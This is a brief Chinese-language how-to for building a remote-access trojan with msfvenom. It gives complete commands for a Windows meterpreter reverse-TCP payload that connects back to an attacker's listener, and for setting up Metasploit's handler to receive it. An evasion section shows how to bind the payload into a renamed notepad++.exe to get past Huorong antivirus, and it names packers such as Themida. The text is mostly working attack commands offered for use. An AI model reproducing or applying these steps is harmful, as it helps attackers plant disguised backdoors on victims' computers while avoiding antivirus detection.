介绍
msfvenom是kali中生成远控木马的工具,在本地监听中上线,在目标机上执行后门
使用流程
1.在shell中直接进入msfvenom面板即可
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.1 lport=9999 -f exe -o attack.exe
msfvenom -p 系统/架构/作用/方式 payload设置 -f 格式 -o 输出文件名
-p payload
-f format
-o output
2.通常在使用msfvenom时,要配合metasploit的handler模块进行监听
1.使用handler模块
use exploit/multi/handler
2.查看handler模块必选项
show options
3.设置handler模块必选项
通常需要设置三个必选项
set payload windows/x64/meterpreter/reverse_tcp
set lhost=xxx.xxx.xxx.xxx
set lport=x
4.运行handler模块
run
免杀思路
1.捆绑木马(绕过火绒)
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=xxx.xxx.xxx.xxx lport=x -f exe -x notepad++.exe -o notepad++.exe
注意,要捆绑的应用程序必须与目标机操作系统的位数一样,即保持为64位即可(国内软件一般为32位,国外一般为64位)
2.加壳
常见加壳软件:穿山甲、Themida等等